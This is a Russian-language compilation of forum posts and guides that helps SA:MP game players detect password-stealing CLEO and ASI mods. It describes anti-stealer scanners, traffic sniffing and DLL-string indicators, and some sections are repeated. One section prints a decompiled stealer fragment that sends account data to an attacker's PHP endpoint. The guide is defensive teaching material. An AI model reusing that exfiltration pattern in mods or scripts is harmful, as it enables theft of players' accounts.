Проверка cleo-файлов на наличие стиллеров. Проверка cleo-файлов на наличие стиллеров Как проверить файл sf на стиллер

Как не нарваться на стиллер?!

Стилер - это скрипт который устанавливается путем копирования файла с вредоносным кодом в папку с GTA. После установки, при каждом заходе на игровой сервер, он будет считывать все вводимые данные в диалогах (пин коды, пароль, секретные ключи, данные) и отправлять их к злоумышленнику. Таким образом, с помощью простой установки скрипта в папку с GTA, при вводе правильных данных в диалог, вы можете лишится всех ваших игровых аккаунтов.

На данный момент участились случаи похищения игровых аккаунтов на различных серверах Samp. Чаще всего это сервера с режимом Role play, так как игровая валюта имеет свою ценность. Злоумышленники делают на вашей глупости деньги. В этой статье я вам покажу способы который я знаю. Знаете люди которые делают эти стилеры живут по такому принципу "Не ешь, не проживешь".

Основные советы:

1. Всегда используйте все способы защиты аккаунта предоставленного вам администрацией проекта на котором вы играете. (Графический пин-код, SMS привязка и другое. Все зависит от функционала сервера).
2. Используйте пароль максимальной длинны и сложною конструкцию.
3. Не авторизуйтесь на сервере с паролем который используйте на других.
4. Не сообщайте данные своего аккаунта человеку в которым вы не уверены на 100%.
5. Я не советую вам использовать различные пользовательские модификации в игре. В них может содержаться зашифрованный вирус (Стиллер). Стиллер (от английского to steal, воровать) - определенный класс троянов (малвари, вирусов - как хотите), функционал которых полностью состоит из кражи сохраненных в системе паролей и отправка их "автору)
После того,как вы установили мод со стилером при заходе в игру вы введете пароль и он успешно перейдет в руки вору. Наиболее часто вшит в такие моды, как (Худ,графическая настройка и Asi плагина).
6. Используйте антивирус! Он не позволяет отправлять на зараженные сайты сохраненные вами почты или аккаунта (защита от грабберов и стиллеров (exe)).
7. Администрация серверов SA:MP не восстанавливает взломанные аккаунты и не возвращает деньги которые были утеряны и никогда не будет просить ваши пароли от аккаунта.

Первый способ.

И так первый способ, это 100% эффективный!!!
Если вы не будете скачивать различные моды, клео скрипты, худы, читы, то у вас не будет НИКАКИХ проблем и НИКАКИХ стиллеров!

Проверка через сайт:

Первый способ защитит от всех взломов, но это не для всех подходит.
И так второй способ подходит для тех кто скачивает скрипты, различные моды, худы, читы и так далее. Поэтому у меня для вас есть выход, но это не 100% не защитит! Тут нам поможет сайт который проверяет файлы на различные скрипты, вот тут . Зайдя на сайт вы можете прочитать "

Самые новые версии стилеров могут иметь.txd .dff .png .dat форматы. Но подключаются они в.asi .cs .sf плагинах и без подключения работать не будут. Поэтому проверяйте все плагины и скрипты с помощью нашей проверки. Если у вас есть скрытные файлы в GTA, удалите их.

Из этого делаем выводы, то что теперь стиллеры могут встраивать в моды, даже в файле.png обычное фото. Многие говорят,

"Ты что баран что ли? Иди отсюда! Я в SA:MP играю 5 лет и я знаю что стиллеры бывают только в модах или клео форматах!"

Нет ребят, как мы видим даже в простой картинке, оружие.png допустим я знаю, может быть стиллер! Всегда проверяем любой мод, как бы вы даже доверяли кому-либо. И так, когда проверяем файл на стиллера, если выскакивает

Информация о результатах поиска:

Стилер не найден:

Во время проверки файла, вредоносного кода или чего либо подозрительного не было обнаружено. Это означает, вы можете не беспокоится о своём аккаунте, наш чекер использует все возможные методы выявления вредоносного кода в скриптах.

Особенности программы:
- Довольно большая база стиллеров, которая пополняется примерно с 2014 года. Нами была собрана не малая часть вредоносных модов с нескольких крупных и не очень сайтов. Отдельное спасибо за предоставленные образцы сайту Gtavicecity.ru.
- Возможность сканирования папок и файлов путем перетаскивания в окно программы.
- Вывод краткой информации о вредоносной программе (тип, ник разработчика и в старых версиях баз ники распространителей)
- Сканирование asi, dll, cleo, sf, cs и других потенциально опасных файлов.
- Обнаружение вредоносного кода в файлах с измененным расширением, например не так давно была мода переименовывать стиллеры в txd файлы и загружать их в игру по средствам лоадера.
- Распаковка криптованных CLEO скриптов и последующее сканирование (следует отметить, что декриптит только известные крипторы и те, что попадались нам, но этот факт легко исправить, достаточно написать нам на почту и отправить файл). Исходник последнего при сканировании распакованного скрипта вы сможете найти в файле temp\decrypt.cs.
- Эмуляция SCM кода на лету и декрипт скрипта с последующей проверкой на вредоносный код. (При обнаружении вредоносного кода см. дамп в temp\decrypt.cs)
- Дружественный и понятный интерфейс программы.
- Довольно простая концепция программы, а значит легко и часто обновляемая.
- Высокая скорость сканирования при проверке большого количества файлов.
- Встроенный просмотр найденного файла в текстовом и hex режимах

Сканер предназначен только для проверки игровых модификаций в распакованном из архива виде, в любом другом случае он бесполезен.
Также он НЕ предназначен для установщиков и автоинсталляторов.

ВНИМАНИЕ!!!
Хотелось бы сразу предупредить, что данная программа не защитит ваши аккаунты на 100%, как и любой другой антивирус, или сканер. Когда пишут на обложке антивируса 100% защита - для меня это уже сигнал к удалению антивируса с диска. Но данный сканер сможет ускорить проверку на уже известные стиллеры и поможет вам не попасться на удочку неопытных распространителей.
Самый лучший антивирус - это ваша голова и решения - качать или не качать. Качайте моды только с проверенных сайтов и там, где следят за безопасностью архива.

Некоторые условные обозначения программы:

В РАЗРАБОТКЕ

HttpAnalyzer это - анализатор сетевого трафика. Если вы искали функциональный инструмент, цель которого производить мониторинг HTTP и HTTPS трафика в режиме реального времени, то думаю данная программа должна вам понравится, это своебразный сниффер, который может в понятном виде отоброжать всю необходимую информацию о соединениях!

Вообoще HTTP Analyzer умеет очень много всего, более подробно думаю сможете прочитать на официальном сайте, основную идею я написал.

Самый первый сканер, который появился еще в те времена, когда был разработан первый asi стиллер. Уже на следующий день после появления стиллера я взялся разрабатывать свой антистиллер.

В состав сканера входят такие модули как:
- сигнатурный движок YARA (спасибо команде программистов Virustotal за столь мощный инструмент),
- скриптовый движок от Андреаса Йонсона (AngelScript), скорость, удобство встраивания и красота си подобных скриптов в одном проекте. Именно благодаря ему можно вскрывать крипторы для CLEO быстро и технично.
- эмулятор SCM кода, способен неплохо раскручивать CLEO крипторы (от меня)

Особенности программы:
- Довольно большая база стиллеров, которая пополняется примерно с 2014 года. Нами была собрана не малая часть вредоносных модов с нескольких крупных и не очень сайтов.
- Возможность сканирования папок и файлов путем перетаскивания в окно программы.
- Вывод краткой информации о вредоносной программе (тип, ник разработчика и в старых версиях баз ники распространителей)
- Сканирование asi, dll, cleo, sf, cs и других потенциально опасных файлов.
- Обнаружение вредоносного кода в файлах с измененным расширением, например не так давно была мода переименовывать стиллеры в txd файлы и загружать их в игру по средствам лоадера.
- Распаковка криптованных CLEO скриптов и последующее сканирование (следует отметить, что декриптит только известные крипторы и те, что попадались нам, но этот факт легко исправить, достаточно написать нам на почту и отправить файл). Исходник последнего при сканировании распакованного скрипта вы сможете найти в файле temp\decrypt.cs.
- Эмуляция SCM кода на лету и декрипт скрипта с последующей проверкой на вредоносный код. (При обнаружении вредоносного кода см. дамп в temp\decrypt.cs)
- Дружественный и понятный интерфейс программы.
- Высокая скорость сканирования при проверке большого количества файлов.
- Встроенный просмотр найденного файла в текстовом и hex режимах

Особо Важный Пункт! Читать всем, дабы не задавать глупых вопросов.
Сканер предназначен только для проверки игровых модификаций в распакованном из архива виде , в любом другом случае он бесполезен!
Также он НЕ предназначен для установщиков и автоинсталляторов, msi, exe пакетов, pif, mmbak, com, scr, vbs, bat, cmd, js и других потенциально опасных файлов, не встречающихся в игровых модах, для этих файлов есть антивирусы!
Также НЕ стоит сканировать систему целиком , это бесполезно и не имеет смысла. Этот сканер оттестирован на модах и предназначен только для модов. Вы можете сканировать папку с игрой, но тут нужно понимать, что в игре есть файлы, которые могут обращаться к интернету и быть готовыми к тому, что-бы их увидеть в окне сканера.

Хотелось бы сразу предупредить, что данная программа не защитит ваши аккаунты на 100%, как и любой другой антивирус, или сканер. Когда пишут на обложке антивируса 100% защита - для меня это уже сигнал к удалению антивируса с диска. Но данный сканер сможет ускорить проверку на уже известные стиллеры и поможет вам не попасться на удочку неопытных распространителей.
Самый лучший антивирус - это ваша голова и решения - качать или не качать. Качайте моды только с проверенных сайтов и там, где следят за безопасностью архива.

Автор программы не несет ответственности за ваши решения и возможные пропущенные сканером стиллеры.

Некоторые условные обозначения программы:

Внимание! Обнаружен файл, который может устанавливать интернет соединение, следует подумать прежде чем ставить в игру. Но это может быть и автообновление скрипта. Также возможно наличие URL адреса в файле. Здесь все зависит от ваших способностей проверять файлы руками.
Найден CLEO стиллер, файл был распакован и вы сможете взглянуть на исходник.
Сканер попытался распаковать скрипт, возможно это не получилось, или не найден вредоносный код. Смотрите исходник в папке temp. Убедитесь в том, что файл не зашифрован. Здесь нужно проверить скрипт руками.
Найден CLEO стиллер в открытом виде.
Найден файл, который выкачивает вредоносную программу на ваш компьютер
Найден стиллер от небезызвестного проекта
Найдена защита, файл может представлять угрозу. Здесь вам остается полагаться на честность и репутацию автора. Задайте вопрос автору почему файл был зашифрован(защищен), а дальше думайте сами над адекватностью ответа. Этот файл вполне может быть опасен.
Возможно файл заблокирован другим приложением, или файл нулевого размера
Не советую ставить в игру подобные файлы. Здесь можно ожидать все, что угодно. Это склейка нескольких файлов в один. Среди этих файлов вполне может оказаться стиллер, или другая малварь. Не доверяйте склейкам. Убедиться в безопасности склейки можно только разобрав ее по файлам и проверив каждый файл отдельно.

Большая просьба, качайте программу только с официальных источников. Это будет самый безопасный вариант.
Обо всех ошибках пишите на почту, или в этой теме.

В качестве динамической защиты аккаунтов рекомендуем использовать специальный плагин от DarkP1xel .

Данный плагин блокирует опасные функции у скриптов и других модов.
Если у вас установлен этот плагин в игре, то моды не смогут отправлять веб запросы на сторонние сервера, а это значит, что ваш пароль от сампа не попадет в чужие руки, даже если вы случайно установили стиллер в игру. Также плагин ведет подробный лог всех подозрительных событий в игре. Важно. Плагин постоянно обновляется, следите за обновлениями.
p.s: не забудьте поблагодарить автора за плагин;)

Спасибо всем, кто нам помогал.
Отдельное спасибо Gedwadion, DarkP1xel. Это крутые ребята у которых есть будущее в IT безопасности.

Авторы:
smalloff - разработка, поддержка проекта
andre500 - тестирование, поддержка проекта
Сайты авторов (официальные источники): Gamemodding.net, Libertycity.ru
Почта: [email protected]
Скачать программу:
Угостить разработчика программы пивом (заранее спасибо): Яндекс нефильтрованное

(Внимание! Поддержка публичного проекта полностью прекращена.)

AVPGameProtect - это программа, помогающая в поиске вредоносных файлов в игровых модификациях. Главная особенность программы перед другими анти-стиллерами - возможность массовой проверки, т.е Вы можете просканировать абсолютно любые файлы и в любом их количестве, достаточно перенести нужные файлы или папку с файлами в окно программы и дождаться результатов сканирования.

Особенности программы:
- Большая база стиллеров, которая ведется с 2014 года.
- Сканирование asi, dll, cleo, sf, cs и других потенциально опасных файлов.
- Высокая скорость работы при проверке большого количества файлов.
- Вывод информации о стиллере в окне программы (тип стиллера или ник разработчика).
- Встроенный просмотр найденных файлов в текстовом и hex режимах.
- Поиск функционала для взаимодействия с интернетом, или скачивания файлов.
- Проверка CLEO-скриптов на наличие стиллера (не всех, только с известными программе крипторами). Декриптованный скрипт появится в папке temp, в корневой папке программы под именем decrypt.cs
- Декрипт FuncCrypt от SR_Team и многих других.
- Постоянная поддержка программы.

Сканер не предназначен для проверки установщиков и игровых сборок, а также для полного сканирования ПК. Для сканирования необходимо извлечь папку или файлы из архива и перетащить их в программу.

Также стоит отметить, что программа не защищает пользователей на все 100%. Как и любой другой анти-стиллер, она предназначена лишь для выявления известных ей стиллеров, а дальнейшее решение об использовании того или иного мода лежит непосредственно на Вас и автор не несёт ответственности за ВАШИ решения. Программа будет постоянно обновляться.

Некоторые условные обозначения программы:
InetLoader - Внимание! Обнаружен файл, который может устанавливать интернет соединение, следует подумать прежде чем качать. Но это может быть и автообновление скрипта.
CLEO_Stealer - Найден CLEO стиллер, файл был распакован и вы сможете взглянуть на исходник.
CLEO_Crypter - Сканер попытался распаковать скрипт, возможно это не получилось, или не найден вредоносный код. Смотрите исходник в папке temp.
CLEO_Stealer - Найден CLEO стиллер в открытом виде.
Downloader_stealer - Найден файл, который выкачивает вредоносную программу на ваш компьютер
Stealers_ru - Найден стиллер от небезызвестного проекта
Danger_VMProtect - Найдена защита, файл может представлять угрозу
Не удалось сканировать - Возможно файл заблокирован другим приложением, или файл нулевого размера
JoinFiles - Сканер нашел склейку нескольких файлов в один. Среди этих файлов вполне может оказаться стиллер, или другая малварь.

Некоторые условные обозначения программы:

Внимание! Обнаружен файл, который может устанавливать интернет соединение, следует подумать прежде чем ставить в игру. Но это может быть и автообновление скрипта. Также возможно наличие URL адреса в файле. Здесь все зависит от ваших способностей проверять файлы руками.
Найден CLEO стиллер, файл был распакован и вы сможете взглянуть на исходник.
Сканер попытался распаковать скрипт, возможно это не получилось, или не найден вредоносный код. Смотрите исходник в папке temp. Убедитесь в том, что файл не зашифрован. Здесь нужно проверить скрипт руками.
Найден CLEO стиллер в открытом виде.
Найден файл, который выкачивает вредоносную программу на ваш компьютер
Найден стиллер от небезызвестного проекта
Найдена защита, файл может представлять угрозу. Здесь вам остается полагаться на честность и репутацию автора. Задайте вопрос автору почему файл был зашифрован(защищен), а дальше думайте сами над адекватностью ответа. Этот файл вполне может быть опасен.
Возможно файл заблокирован другим приложением, или файл нулевого размера
Не советую ставить в игру подобные файлы. Здесь можно ожидать все, что угодно. Это склейка нескольких файлов в один. Среди этих файлов вполне может оказаться стиллер, или другая малварь. Не доверяйте склейкам. Убедиться в безопасности склейки можно только разобрав ее по файлам и проверив каждый файл отдельно.

Данный плагин блокирует опасные функции у скриптов и других модов.
Если у вас установлен этот плагин в игре, то моды не смогут отправлять веб запросы на сторонние сервера, а это значит, что ваш пароль от сампа не попадет в чужие руки, даже если вы случайно установили стиллер в игру. Также плагин ведет подробный лог всех подозрительных событий в игре. Важно. Плагин постоянно обновляется, следите за обновлениями.
p.s: не забудьте поблагодарить автора за плагин;)

Авторы:
smalloff - разработка, поддержка проекта
andre500 - тестирование, поддержка проекта
Сайты авторов (официальные источники): сайт, Libertycity.ru
Почта: smalloff@сайт
Скачать программу: AVPGameProtect18042019.rar
Угостить разработчика программы пивом (заранее спасибо): Яндекс нефильтрованное

(Внимание! Поддержка публичного проекта полностью прекращена.)

[Серьёзный голос Чонишвили]: Без лишних слов. К чёрту представление. Пока я пишу это, твой буллет и вилла на ВВ уже слилты в гос, а вирты переведены злоумышленику, ах-ха-ха-ха, кх кхм кхм КХЫ *подавился*

Можете остудить свои пуканы, потому что на сайт cleo-файлы не заливаются. Но это не значит что они запрещены на проекте Samp-Rp. Не путайте, блин!
Все любители модификаций встречались с понятием термина "Стиллер" (a.k.a Кейлогер, но это х_уже. другая история). Обычно стиллеры суют в клео-скрипты, о которых сейчас и пойдёт речь.

Что такое клео-скрипт?

Не буду пояснять что такое клео-скрипт в общем понятии, перейдём сразу к онлайн-игре. Клео-скрипты для SA:MP"a разработаны для улучшения комфортности игры. Благодаря им, вы можете изменить интерфейс под себя. Профикстить различные баги, вылеты и т.д. Но есть и вредоносные (или читерские) клео-скрипты (cheat - обман от. англ), которые, кстати, строго запрещены на проекте Samp-Rp . Они созданы для обиженных на жизнь детей, которых в школе побили. Ну и нельзя не вставить фразу: "Читы - как виагра, для тех кто сам не может."
Самые известные клео-скрипты (.c leo s cript -файлы) - это показатель HP в цифрах, квадратный радар, скрипт повышающий FPS, различные формы полоски брони и здоровья (иногда это даже не просто полоски, а ваш любимый персонаж, к примеру A$AP Rocky . С понижением хп - исчезает фотография, и остаётся только силуэт).
Многих мучает вопрос, почему же на сайте нет enb series? Дело в том, что .asi формат, это тоже клео-файл, только скомпилированный. То есть, в него тоже можно вшить стиллер.
Вы, наверное, думаете, зачем я пишу тему, если на сайте всё равно нет клео. Но это на сайте нет, а ведь чтобы сдержать хотя бы нужен StreamMemFix1.0.asi И это только один из множества фиксов для GTA, которых полно у каждого любителя накачать свою San Andreas модами до отказа, и тем самым сделать из неё конфетку. И я молчу уже про c-hud"ы и прочие модификации. Жалко аккаунт? Тогда эта тема для тебя!

Как проверить.cs-файл на стиллер ?

Самый распространённый способ - проверка через программу Wireshark . Всё что потребуется:

1. Скачать саму программу (сделать это можно с официального сайта).
2. Посмотреть это видео, там всё понятно рассказано.

=====================================================================================================

Второй способ проверки клео на стиллер. В последней версии cleo-библиотеки идут дополнительные программы, одна из них называется Sunny Builder - то что нам нужно.

0AB1: call_scm_func @stealer_by_mg 0 1@
:mg__steal__format_url
"http:" 2f 2f "candyquendy.hol.es " 2f "acci" 2f "add.php?" 00

candyquendy.hol.es - сайт, куда отправляют данные об аккаунте.
@stealer_by_mg 0 1@ - сам разработчик стиллера.

=================================================================================================

Так же, есть третий способ проверить файл на стиллер. Есть скрипт "steal_logger.asi " - с его помощью и будем проверять.
(Да, он сам клео формата, но здесь нет ничего страшного, если вы не додумаетесь заходить с ним на основу). Ссылку на него не дам, ищите на просторах сети.
В кратце объясню, как им пользоваться.

1. Суём в папку с игрой.
2. Заходим на любой сервер SA:MP, под любым ником.
3. Придумываем любой пароль, авторизовываемся и сворачиваем игру.
4. В папке должен создаться текстовый файл (.txt формата). Нажимаем на него, и в тексте ищем строчку с IP нашего сервера и паролем от только что зарегистрированного аккаунта. Нашли - значит эти данные уже у взломщика. Пускай радуется, когда зайдёт за бича поиграть. А мы в это время удаляем последний клео-файл.

[!] В качестве проверки использовать только новосозданные аккаунты, не заходите на свои основные аккаунты с этим скриптом. После проверки удалить \ или сделать отдельную копию GTA для проверок скриптов [!]

Как проверить.asi-файл на стиллер ?

Самое лёгкое позади. Теперь учимся проверять .asi -файлы, ведь в них Wireshark стиллер не видит. Что же делать? Выложу пару наиболее известных способов.

Наиболее эффективный способ проверки. Проверка через программу IEInspector HTTP Analyzer .

===============================================================================================================

Второй способ - проверка кода блокнотом.

1. Открываем .asi через Блокнот.
2. Смотрим код.

Пример чистого когда (Нет стиллера)

Пример кода со стиллером (не kernel.dll)

Обращаем внимание на последние строчки.

Ещё один вариант скрытого стиллера - названия в тексте "urlmon.dll ", "wininet.dl l", "wsock32.dll " в самом коде. Либо строчка "kernel32.dll ExitProcess user32.dll MessageBoxA wsprintfA LOADER ERROR "

========================================================================================================

"Администрация не восстанавливает утерянные аккаунты" - говорили они.
"Безопасность аккаунта в ваших руках" . Надеюсь, что после прочтения этой темы, "выши руки" стали сильнее. Берегите свои аккаунты.